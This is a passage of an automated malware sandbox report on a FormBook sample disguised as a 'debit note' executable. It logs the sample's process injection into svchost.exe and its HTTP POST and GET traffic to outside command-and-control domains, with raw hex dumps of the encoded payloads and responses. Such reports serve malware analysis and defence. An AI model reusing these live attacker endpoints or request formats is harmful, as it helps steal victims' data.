                                                        Data Raw: 51 38 72 3d 7a 49 52 48 38 38 37 57 38 6a 42 34 4f 37 61 78 32 58 66 36 31 68 68 52 49 4d 73 50 6a 75 45 45 69 41 41 67 41 52 51 69 2f 35 69 67 68 73 78 6a 71 68 4a 71 68 58 48 70 6d 35 41 33 57 50 42 52 41 6f 71 76 56 47 6a 62 6b 52 32 59 6c 37 47 69 39 61 4c 63 67 59 31 65 4c 31 32 2b 6c 4d 75 5a 67 73 6a 6a 30 44 67 33 53 75 49 6d 64 71 42 38 68 71 78 50 77 52 51 62 4d 49 6a 36 48 79 46 73 50 75 57 4f 4c 34 62 48 61 7a 78 54 6f 5a 57 68 2b 65 6c 4e 56 73 31 7a 72 58 7a 63 38 38 6c 76 69 66 75 66 42 6a 46 2f 59 45 67 66 49 70 49 48 79 4a 49 4a 74 45 6a 61 36 73 47 66 74 4c 4f 58 69 39 34 2f 42 68 6d 47 35 42 67 36 6d 68 34 75 77 53 2b 57 69 4a 55 3d
                                                        Data Ascii: Q8r=zIRH887W8jB4O7ax2Xf61hhRIMsPjuEEiAAgARQi/5ighsxjqhJqhXHpm5A3WPBRAoqvVGjbkR2Yl7Gi9aLcgY1eL12+lMuZgsjj0Dg3SuImdqB8hqxPwRQbMIj6HyFsPuWOL4bHazxToZWh+elNVs1zrXzc88lvifufBjF/YEgfIpIHyJIJtEja6sGftLOXi94/BhmG5Bg6mh4uwS+WiJU=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        47192.168.2.450049168.76.221.252805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:13:50.723597050 CET10840OUTPOST /lxjv/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.5hdgb2p9a.buzz
                                                        Origin: http://www.5hdgb2p9a.buzz
                                                        Content-Length: 10300
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.5hdgb2p9a.buzz/lxjv/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 7a 49 52 48 38 38 37 57 38 6a 42 34 4f 37 61 78 32 58 66 36 31 68 68 52 49 4d 73 50 6a 75 45 45 69 41 41 67 41 52 51 69 2f 35 71 67 6d 65 35 6a 72 47 6c 71 37 58 48 70 72 5a 41 6a 57 50 41 52 41 6f 79 7a 56 47 76 68 6b 54 2b 59 6c 5a 4f 69 2f 76 72 63 72 59 31 65 55 46 32 7a 6d 38 75 4d 67 6f 47 6f 30 44 77 33 53 75 49 6d 64 73 39 38 77 37 78 50 79 52 51 59 62 34 6a 32 44 79 46 55 50 75 65 65 4c 2b 48 58 61 44 52 54 72 36 75 68 79 4c 35 4e 63 73 31 74 6f 58 7a 45 38 38 6f 2f 69 66 44 6b 42 6a 78 42 59 48 38 66 5a 2b 56 42 6a 61 77 52 30 30 6a 34 73 76 61 47 70 63 36 74 70 39 59 2b 4f 41 6d 79 75 6a 6f 68 6f 44 68 35 31 52 36 52 35 73 52 56 43 31 68 42 58 46 74 4b 30 37 36 73 38 61 49 42 42 6c 55 56 41 31 6f 45 69 69 6a 74 4e 36 44 77 4b 66 51 64 57 79 7a 70 65 53 38 46 41 39 6d 61 63 33 72 50 38 34 6b 7a 52 6a 66 4f 4e 72 38 35 48 76 63 48 68 30 75 7a 52 67 33 74 46 67 68 2f 52 4d 61 75 53 34 57 54 37 53 30 51 71 54 5a 51 4c 65 49 6d 2f 66 32 6a 53 4f 79 55 4d 31 33 2b 2f 42 34 54 34 51 [TRUNCATED]
                                                        Data Ascii: Q8r=zIRH887W8jB4O7ax2Xf61hhRIMsPjuEEiAAgARQi/5qgme5jrGlq7XHprZAjWPARAoyzVGvhkT+YlZOi/vrcrY1eUF2zm8uMgoGo0Dw3SuImds98w7xPyRQYb4j2DyFUPueeL+HXaDRTr6uhyL5Ncs1toXzE88o/ifDkBjxBYH8fZ+VBjawR00j4svaGpc6tp9Y+OAmyujohoDh51R6R5sRVC1hBXFtK076s8aIBBlUVA1oEiijtN6DwKfQdWyzpeS8FA9mac3rP84kzRjfONr85HvcHh0uzRg3tFgh/RMauS4WT7S0QqTZQLeIm/f2jSOyUM13+/B4T4QGvejwPDFhlZH/BpNrEdt1FJYAeoPVuZIwz/c6isXJxbkl5wxXTOb1TIS4cXPE3+X0lQDh8R8L8o1pt1cJyN0zxOHbGYmaQKrG5wFLvlgAHXPnZyS/VwsbETf0JdUkZXOzL1exakMZ6wGNZGL8ZN+Hegyl+iXrClPzCZCT63HUaJ3Nf1EVf7+8CEbawbbS2fm4iEWbrWJAtL9M/3keFP/7v/mbpLYyeyByL6xJGEW31uOSakDzPh/Q2fH3amylvag0bROQUe8jFLBqst6Z7NzePRmUgdv0rjk2BV9G8WOtEekBBxWxmm5q88PCP7cPsTCJinGYkJvoz7+gCFDEHew1BP8S8zEFlpTA6fC8UKXsEaRx8eGSSpm9JyDem7+rK9+h6qYw4GVcKCVD7pNt8cE3vjt3rt6aHcEPmpQPQdcaeU6vpFpWohSaCHwMUMs9baNpK9Gxb2fQ3JD4/XYMFhk/hostqhmds7ssCy/qUsN3wb//nclaZjunAHwMrGwPWQCklB/zFKxhvPjErZtRPlEsr0EFtVZJd+7UYn/l3eo5h95Rdz+KgfCUBrZ7pdIt8WgrDCEe+PR7ZAiFHRis20VB2W4dEq6etomMnCNI/j2cblgLZ1Qw+XYG6evKBjT1yJg3SEsQ2ZN4RsyodzDQDf7EUcYB6QrgH7nL4 [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        48192.168.2.450050168.76.221.252805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:13:53.387837887 CET466OUTGET /lxjv/?6trpq=anQT3n&Q8r=+K5n/IT0yXRRANeuqn/owCg6I74ZgbMezEFWIjAj36nDkdhnum9kwXyxiYh8DtQScaz4Dnq0yx+OkYvS6b/TqIhsF3CYh8jP4suZ5AZYY+5BPcJw3t1/wxU= HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Host: www.5hdgb2p9a.buzz
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        49192.168.2.450051185.179.189.193805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:13:59.645554066 CET738OUTPOST /kbf1/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.jivatop.online
                                                        Origin: http://www.jivatop.online
                                                        Content-Length: 200
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.jivatop.online/kbf1/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 2b 62 58 6e 65 4a 36 2f 38 69 36 37 48 67 56 6a 4b 5a 6b 6e 72 50 4c 46 39 45 49 48 4b 76 4c 45 74 77 56 33 5a 53 64 61 73 35 68 43 64 4d 58 70 77 4a 52 50 74 39 77 32 61 4c 6e 54 45 49 7a 76 30 39 34 49 4b 34 4a 49 34 56 53 61 6c 78 4d 78 57 79 35 48 50 57 75 69 64 58 49 64 37 50 4a 79 56 48 36 69 6a 33 50 74 74 70 38 38 31 76 69 4d 78 75 5a 4e 41 59 46 71 2f 45 2f 46 7a 44 4a 50 61 65 31 64 58 50 54 6d 7a 49 6d 38 43 30 4f 61 72 33 41 42 78 39 77 5a 39 2b 76 68 51 32 4d 57 4c 39 42 64 4f 6b 33 43 44 49 7a 67 6a 45 79 64 32 52 67 51 54 31 42 61 52 6c 52 57 59 6e 35 67 31 67 3d 3d
                                                        Data Ascii: Q8r=+bXneJ6/8i67HgVjKZknrPLF9EIHKvLEtwV3ZSdas5hCdMXpwJRPt9w2aLnTEIzv094IK4JI4VSalxMxWy5HPWuidXId7PJyVH6ij3Pttp881viMxuZNAYFq/E/FzDJPae1dXPTmzIm8C0Oar3ABx9wZ9+vhQ2MWL9BdOk3CDIzgjEyd2RgQT1BaRlRWYn5g1g==
                                                        Nov 4, 2024 10:14:00.640861034 CET1236INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Mon, 04 Nov 2024 09:14:00 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Content-Encoding: gzip
                                                        Expires: Mon, 04 Nov 2024 09:14:00 GMT
                                                        Set-Cookie: _subid=3qajmfe2dlt8v; expires=Thu, 05 Dec 2024 09:14:00 GMT; path=/
                                                        Set-Cookie: 7e41a=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjlcIjoxNzMwNzExNjQwfSxcImNhbXBhaWduc1wiOntcIjNcIjoxNzMwNzExNjQwfSxcInRpbWVcIjoxNzMwNzExNjQwfSJ9.uFz9Sd1YXciHddkYNklNkeUFgqXoDg6r1cwSpv-QaTo; expires=Sat, 09 Sep 2079 18:28:00 GMT; path=/
                                                        Vary: Accept-Encoding
                                                        X-Powered-By: PHP/7.4.33
                                                        Access-Control-Allow-Origin: *
                                                        Data Raw: 64 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 ff ec 7d 5f 6f 1c 47 76 ef bb 3f 45 2f 1f 2e ee c5 d5 11 45 c9 a6 6d 2e a9 7d d8 bb 17 c9 4b 12 24 5e 2c f2 44 d4 74 17 d9 65 75 57 75 aa aa 5b ea 21 0c 90 1c cb 94 57 b2 98 f5 2e 76 03 af 1d 7b 91 20 1b c0 48 76 48 73 ac d1 90 1c 02 fa 04 55 5f 61 3f 49 50 a7 7a 86 94 44 8e a9 84 c6 f4 58 ad 07 91 d3 ec ea 29 72 4e 9d df f9 fb 3b 6f 2c ff e8 ff fd f5 4f df fb fb bf f9 59 10 eb 34 b9 fd c6 b2 fb 12 24 84 af af cc 51 3e 77 fb 8d 20 08 82 e5 98 92 e8 f6 72 8b 28 1a c4 92 ae ad cc cd 27 84 47 54 ce 73 51 08 a5 19 28 ba 2e 22 5e 12 00 28 14 85 ea f2 3c e3 11 bd 77 3d 8b b3 ea 41 f8 b0 94 6a 12 c4 5a 67 40 ff 21 67 c5 ca dc 4f 05 d7 94 6b 78 af cc e8 5c 10 fa 57 2b 73 9a de d3 f3 6e 3b 3f 0e c2 98 48 45 f5 ca cf df fb ff f0 ce 5c 30 7f e6 69 9a e9 84 de 36 5f 98 a1 d9 37 43 bb 65 b7 4d 3f b0 5b a6 67 be 31 43 73 60 8e ed 6e b0 14 98 4f dd a5 c0 1c 9f bd 6d 79 de 2f 7e 61 6b 9c a4 74 65 ae 60 f4 6e 26 a4 3e b3 a1 bb 2c d2 f1 4a 44 0b 16 52 c0 17 d7 02 c6 99 66 24 [TRUNCATED]
                                                        Data Ascii: d96}_oGv?E/.Em.}K$^,DteuWu[!W.v{ HvHsU_a?IPzDX)rN;o,OY4$Q>w r('GTsQ(."^(<w=AjZg@!gOkx\W+sn;?HE\0i6_7CeM?[g1Cs`nOmy/~akte`n&>,JDRf$,<;eBULRkku=TOW_WF7oWHGN=XZxsFv3_t}~u@6U+snuwo[xG,K(h1L|o~7~%td2OFD<og?
                                                        Nov 4, 2024 10:14:00.640980005 CET212INData Raw: ee ea 1c b6 44 54 06 61 42 94 5a 99 fb db 9f 9f 3d 54 11 2b 46 3f 48 84 13 8f c0 7f 01 c0 af d1 99 7b cf bf 7f 75 d5 7d 65 7c 7d ee f6 f2 7c c4 8a 33 cf 7e e1 e5 99 a5 77 25 c9 5e 7c b2 97 ce d1 1d 11 5d 23 79 a2 e7 02 fc f8 57 e6 22 a6 b2 84 94
                                                        Data Ascii: DTaBZ=T+F?H{u}e|}|3~w%^|]#yW"KZBT@Nj+!~9q1K}4U3>~X/Ow%\{[N/:oz7kwj{Du!K2z
                                                        Nov 4, 2024 10:14:00.641124964 CET1236INData Raw: a2 44 c8 a8 2e cf 79 ff 7f 36 7b f6 63 d3 43 3d b9 6f ba df db 0e 5a b9 62 9c ba d3 ff d2 16 fe dd 0c 6d 07 cc 9e e9 9b 27 e6 d8 ed e5 7b db 45 4c 49 a2 e3 73 f6 f0 3b 73 60 86 76 d3 81 86 7d 64 7a df db 06 42 21 ee b8 a3 f7 f2 0e 3e b3 1d 73 68
                                                        Data Ascii: D.y6{cC=oZbm'{ELIs;s`v}dzB!>sh(<'#,#oxgt7pUFX$!i%wrKwp]Ju^tk-Y]<ju"h%"73c$hSKw>+u
                                                        Nov 4, 2024 10:14:00.641449928 CET1236INData Raw: a9 69 fd 85 1b de 8b aa ab de 6f e4 6a 56 b4 fe a7 81 f9 dc d9 b5 66 60 f6 4d 2f 58 58 04 af c9 d1 bd 41 17 66 68 0e 1c 16 a0 b2 1f 9a 41 60 3b e6 c8 c1 03 86 e9 9c 4b d4 33 07 18 dc 7b 1a d8 0f 31 af 74 64 1f 62 b6 c8 6e a1 3a 3d 46 77 eb 23 fb
                                                        Data Ascii: iojVf`M/XXAfhA`;K3{1tdbn:=Fw#pp5ZOy$BH:HTH$! Z@fhK4%d]D$v7sZj?~ZQa16@{bCFPm*Ux.Bfm\4UAx/0:DaMG/Ss0Z$iDPJ
                                                        Nov 4, 2024 10:14:00.641455889 CET424INData Raw: b9 f9 90 51 49 13 91 12 ce 45 09 79 24 0a 16 c6 94 87 4d 1d e1 f4 72 de ad 51 5f 74 4d 01 a4 91 b8 99 47 9a 67 5f 9b 2f 2b 0a a9 a1 cf 7e 7b 5a 5c 87 1f 7d 6c 78 f3 2c 86 7d d3 7b 76 b8 34 4e 44 9c 03 4b d7 46 f9 07 1f 19 42 f8 ba 8f 4d 74 7d 74
                                                        Data Ascii: QIEy$MrQ_tMGg_/+~{Z\}lx,}{v4NDKFBMt}t90kq9n40R%LvI{2>='Zb9IE$ES2nj<<F1*;f"?}lD.+D*"TCMR`EBH;*+Io0
                                                        Nov 4, 2024 10:14:00.642085075 CET1236INData Raw: 62 5c 08 8b 96 4e bb 2e 9a bc c4 a5 56 4e da f5 15 c5 7a 84 f6 31 5a 3f 33 40 41 41 54 cc 52 10 72 9d 70 d6 4e 45 0a 40 15 4e 12 80 8c 69 20 49 28 d6 45 02 0b 90 52 55 12 dd 54 91 4f b3 cf f9 46 9d 3d 82 46 b4 66 09 11 3e f5 44 a8 55 30 ff 74 60
                                                        Data Ascii: b\N.VNz1Z?3@AATRrpNE@Ni I(ERUTOF=Ff>DU0t`HCQ9?rigT85_s10Cd;Ag&Y{R<R,!IQPP,IpT3|x2*$<BPTF49KtrEy3bn4xDJ>AY?
                                                        Nov 4, 2024 10:14:00.642091990 CET1236INData Raw: cd 53 b6 c6 b4 62 52 14 84 bb f3 aa 69 22 a0 5d d0 76 c4 00 20 23 19 e3 2c 86 48 84 31 0d 01 c0 5d 5c 63 6d 99 87 04 00 8a 84 44 2c 65 92 00 cb 88 16 45 53 8c 3e 45 a8 a8 b9 f3 d1 48 de 0f 07 48 90 53 c9 67 a1 b1 6e f5 18 8d 7e 44 8e 23 db 31 47
                                                        Data Ascii: SbRi"]v #,H1]\cmD,eES>EHHSgn~D#1GfiTagt8<;t:wd~j6}|M9BZlx-9B$"a@BHPv!yAZ$mFF*OV?J;U7_C
                                                        Nov 4, 2024 10:14:00.642688990 CET294INData Raw: 75 8e eb 34 f2 54 7f 35 fe 45 15 48 79 5a 19 e6 7e 40 cd 78 3c bf f9 d6 97 f5 8f c8 8a 7a 48 51 6d 3f 34 3d 1c cf df 37 fb 9e f5 68 0f ed ee a1 d3 e6 e3 4c f0 26 0e 61 1e d6 32 46 f3 1a 86 f1 c3 98 29 4d 4a 02 34 6c 0b cd 42 02 10 b2 82 41 9e e4
                                                        Data Ascii: u4T5EHyZ~@x<zHQm?4=7hL&a2F)MJ4lBAabB5@J%%~/IrFjLiO<a3U_sW?1v9\H7I{$I&*g%c7=5fmFC'f`!bykz


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        50192.168.2.450052185.179.189.19380
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:14:02.704837084 CET758OUTPOST /kbf1/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.jivatop.online
                                                        Origin: http://www.jivatop.online
                                                        Content-Length: 220
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.jivatop.online/kbf1/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 2b 62 58 6e 65 4a 36 2f 38 69 36 37 47 44 39 6a 5a 4b 38 6e 6a 50 4c 47 78 6b 49 48 63 66 4c 36 74 77 5a 33 5a 51 74 4b 73 50 78 43 63 74 6e 70 78 49 52 50 68 64 77 32 50 37 6e 57 62 59 7a 6d 30 39 31 39 4b 34 31 49 34 56 32 61 6c 30 49 78 57 44 35 59 64 32 75 67 53 33 4a 37 2f 50 4a 79 56 48 36 69 6a 32 76 48 74 70 55 38 30 62 65 4d 77 50 5a 4d 4f 34 46 6c 2b 45 2f 46 33 44 4a 4c 61 65 30 36 58 4e 33 49 7a 4b 65 38 43 30 2b 61 72 6a 30 47 6d 74 77 62 35 2b 75 2b 41 45 78 35 48 73 6c 63 44 48 44 47 64 36 37 46 69 43 2f 48 6e 67 42 48 42 31 6c 70 4d 69 59 69 56 6b 45 70 75 69 43 79 44 75 37 45 55 66 46 4c 6c 48 37 42 34 44 56 62 33 76 6b 3d
                                                        Data Ascii: Q8r=+bXneJ6/8i67GD9jZK8njPLGxkIHcfL6twZ3ZQtKsPxCctnpxIRPhdw2P7nWbYzm0919K41I4V2al0IxWD5Yd2ugS3J7/PJyVH6ij2vHtpU80beMwPZMO4Fl+E/F3DJLae06XN3IzKe8C0+arj0Gmtwb5+u+AEx5HslcDHDGd67FiC/HngBHB1lpMiYiVkEpuiCyDu7EUfFLlH7B4DVb3vk=
                                                        Nov 4, 2024 10:14:03.717515945 CET1236INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Mon, 04 Nov 2024 09:14:03 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Content-Encoding: gzip
                                                        Expires: Mon, 04 Nov 2024 09:14:03 GMT
                                                        Set-Cookie: _subid=3qajmfe2dlt92; expires=Thu, 05 Dec 2024 09:14:03 GMT; path=/
                                                        Set-Cookie: 7e41a=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjlcIjoxNzMwNzExNjQzfSxcImNhbXBhaWduc1wiOntcIjNcIjoxNzMwNzExNjQzfSxcInRpbWVcIjoxNzMwNzExNjQzfSJ9.BSqzncxLXTS-BVWxtlsj08iqnAUmpSROJZJmxfq_sWA; expires=Sat, 09 Sep 2079 18:28:06 GMT; path=/
                                                        Vary: Accept-Encoding
                                                        X-Powered-By: PHP/7.4.33
                                                        Access-Control-Allow-Origin: *
                                                        Data Raw: 64 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 ff ec 7d dd 6e 1c 47 76 ff bd 9f a2 97 17 7f fc 83 e8 88 22 65 4b 32 97 d4 5e 6c 36 48 6e 92 20 f1 62 91 2b a2 a6 bb 38 5d 56 77 55 a7 aa ba a5 1e c2 c0 90 b4 2c 39 92 c5 ac 77 b1 1b 78 bd b1 17 09 b2 01 8c 64 87 14 c7 1c 91 9c 21 a0 27 a8 7a 85 7d 92 a0 4e f5 f0 4b d4 48 da d0 98 a6 d5 bc 20 67 7a aa 7a 8a 33 a7 ce af ce d7 ef bc b3 f8 83 bf f8 db 1f 7f f0 8f 7f f7 93 20 d6 69 72 fb 9d 45 f7 27 48 08 6f 2f cd 50 3e 73 fb 9d 20 08 82 c5 98 92 e8 f6 62 8b 28 1a c4 92 ae 2c cd cc 26 84 47 54 ce 72 51 08 a5 19 28 da 16 11 2f 09 00 14 8a 42 75 79 96 f1 88 de bb 9a c5 59 75 23 bc 59 4a 35 09 62 ad 33 a0 ff 94 b3 62 69 e6 c7 82 6b ca 35 7c 50 66 74 26 08 fd b3 a5 19 4d ef e9 59 b7 9c 1f 06 61 4c a4 a2 7a e9 a7 1f fc 25 dc 9a 09 66 4f dc 4d 33 9d d0 db e6 b7 66 64 b6 cd c8 ae d9 75 33 08 ec 9a e9 9b a7 66 64 76 cc d0 6e 06 0b 81 f9 dc 5d 0a cc f0 e4 b0 c5 59 3f f9 cc d2 38 49 e9 d2 4c c1 e8 dd 4c 48 7d 62 41 77 59 a4 e3 a5 88 16 2c a4 80 4f ae 04 8c 33 cd 48 02 2a [TRUNCATED]
                                                        Data Ascii: d96}nGv"eK2^l6Hn b+8]VwU,9wxd!'z}NKH gzz3 irE'Ho/P>s b(,&GTrQ(/BuyYu#YJ5b3bik5|Pft&MYaLz%fOM3fdu3fdvn]Y?8ILLH}bAwY,O3H*$];;eBUL>P*fAn7\hJ#F$QSrs7s&<PgWH.]eP4s}7KoA,E0v's*,j6%_]o~>
                                                        Nov 4, 2024 10:14:03.717622042 CET212INData Raw: 6c 89 a8 0c c2 84 28 b5 34 f3 f7 3f 3d b9 a9 22 56 8c 5f 48 84 13 8f c0 ff 01 c0 bf d1 89 b1 e7 8f 5f 5e 76 7f 19 6f cf dc 5e 9c 8d 58 71 e2 de 67 9e 9e 98 7a 57 92 ec ec 9d bd 74 8e 47 44 74 85 e4 89 9e 09 f0 eb 5f 9a 89 98 ca 12 52 2e 04 2b 09
                                                        Data Ascii: l(4?="V_H_^vo^XqgzWtGDt_R.+3sq>>@zif~gxmqDxW]u57)kz!u-SJ'N)_oGmozfMnE-&{D??YR"dT
                                                        Nov 4, 2024 10:14:03.717633009 CET1236INData Raw: e7 bc ff bf 99 2d fb a9 e9 a3 9e dc 36 bd ef 6c 05 ad 5c 31 4e dd ee 7f 61 09 ff 65 46 76 03 cc 96 19 98 5d 33 74 6b f9 ce 56 11 53 92 e8 f8 9c 35 fc da ec 98 91 ed 3a d0 b0 8f 4d ff 3b 5b 40 28 c4 1d b7 f5 5e 5c c1 17 76 c3 ec 9b 01 0a 42 d7 0c
                                                        Data Ascii: -6l\1NaeFv]3tkVS5:M;[@(^\vBTg>%tYE-z8[t6ZTGD$N+[{T;M/e[-_g(oRm,V";'dCZ{YA0NA
                                                        Nov 4, 2024 10:14:03.718060017 CET212INData Raw: f9 79 f7 7d d6 de f8 92 4f e0 73 6a f6 6b 3c 99 af 7d cf fc 73 97 18 10 ee 90 d0 9d d6 da 42 8b 82 69 00 08 45 46 69 18 73 56 02 80 ca 33 00 49 b5 a2 99 76 2f 69 21 59 09 42 69 92 a8 92 80 02 25 0a aa 55 c8 62 28 24 4d 29 6f f6 ef b4 c0 21 ac 39
                                                        Data Ascii: y}Osjk<}sBiEFisV3Iv/i!YBi%Ub($M)o!984vy3{CSF47hEfhgf7B`o?1}shfT~kv3k?]GZ}sf0N4n8g$/|\p[C e<9
                                                        Nov 4, 2024 10:14:03.718071938 CET1236INData Raw: 49 49 34 14 54 41 41 c3 98 4a 80 f0 b4 62 51 31 0b 89 e4 79 99 43 87 84 b9 0a 73 60 1d 50 71 26 85 6e 94 c6 45 a2 53 f0 46 f0 f4 1e 26 71 d7 14 9c 1a 79 bb fc 20 f5 8b 53 b8 e4 e0 c4 29 e2 c0 1c 98 81 19 da 0d bb 6e 37 ae 04 a6 17 d8 fb 3e a9 c0
                                                        Data Ascii: II4TAAJbQ1yCs`Pq&nESF&qy S)n7>n!zmw!@xgax'6fn8]7:JR,!IQPP,IpT1Pa(*#<N(g"$mQ6^U\Fk"8_|9 ]D}L
                                                        Nov 4, 2024 10:14:03.718085051 CET1236INData Raw: 42 14 ac 84 4c 44 b1 88 8e f3 16 5b 22 a1 14 e8 ca 0a 0d 35 2b b8 80 96 90 42 fb e2 61 49 42 91 36 bb 74 6a 08 10 df a8 73 f1 5f 23 4f f5 d7 fa d8 19 cc 97 8c 3b fd bd e3 19 46 5e 48 6b dd 0d 0a 62 34 30 0d 0a f2 a5 14 a6 1f d8 cf ec c7 f6 63 d3
                                                        Data Ascii: BLD["5+BaIB6tjs_#O;F^Hkb40c7{$|#gQw1~=2RrP>0H04i"SN #,H1]\a.!K$2"7km47mXn/1gvh3v(>6tr-~vpLb59
                                                        Nov 4, 2024 10:14:03.718868017 CET1236INData Raw: 69 60 0e ec 86 fd f4 84 43 68 92 40 35 5e 9e 57 ae f9 62 74 bc 0f b2 79 9e 01 0d 91 c8 44 c2 dd 29 8d 93 92 f8 f0 5a 49 e0 54 9c 4d 92 ce 98 9a e0 b8 33 0b 28 98 bb 0e a5 1f 48 cb e6 90 36 45 00 78 b7 d6 00 d0 08 dc e5 47 87 9f 1f c7 70 8f 29 2e
                                                        Data Ascii: i`Ch@5^WbtyD)ZITM3(H6ExGp).0})`%o'vse\>CBG ]_K^Kwq9HEC$:jXyIlGR( )Q1g1g%m<dw\_/>>]Ff'&u38N/~I;+7?Q
                                                        Nov 4, 2024 10:14:03.718880892 CET485INData Raw: fa 82 e2 0b a2 1d 11 50 18 c9 2b 88 a4 3c 2f 73 08 89 d4 42 c5 61 de 6c ba e9 05 0e ea 9d ab df c8 4d 6d 94 f5 17 58 26 b5 83 aa 79 1c f8 75 27 7d 1f 20 e8 3b 2b c0 3e 41 97 3e 3a 6d 46 ee 84 6d 37 16 aa a3 be 7d 6c 1f 62 da cf 98 3a c7 19 07 6e
                                                        Data Ascii: P+</sBalMmX&yu'} ;+>A>:mFm7}lb:nHo?twIhz?PO3}&V4~U_`@B40:16Eyc#Wz!Osd bH]O|Q1X;Txk^$*d%y$:1g!(


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:04:09:53
                                                        Start date:04/11/2024
                                                        Path:C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe"
                                                        Imagebase:0x800000
                                                        File size:1'627'136 bytes
                                                        MD5 hash:A60AE01B598FD87CBC1ED78936DED2E6
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:1
                                                        Start time:04:10:09
                                                        Start date:04/11/2024
                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe"
                                                        Imagebase:0xe80000
                                                        File size:46'504 bytes
                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2058640139.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2059058691.0000000004D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:04:10:28
                                                        Start date:04/11/2024
                                                        Path:C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe"
                                                        Imagebase:0xcd0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
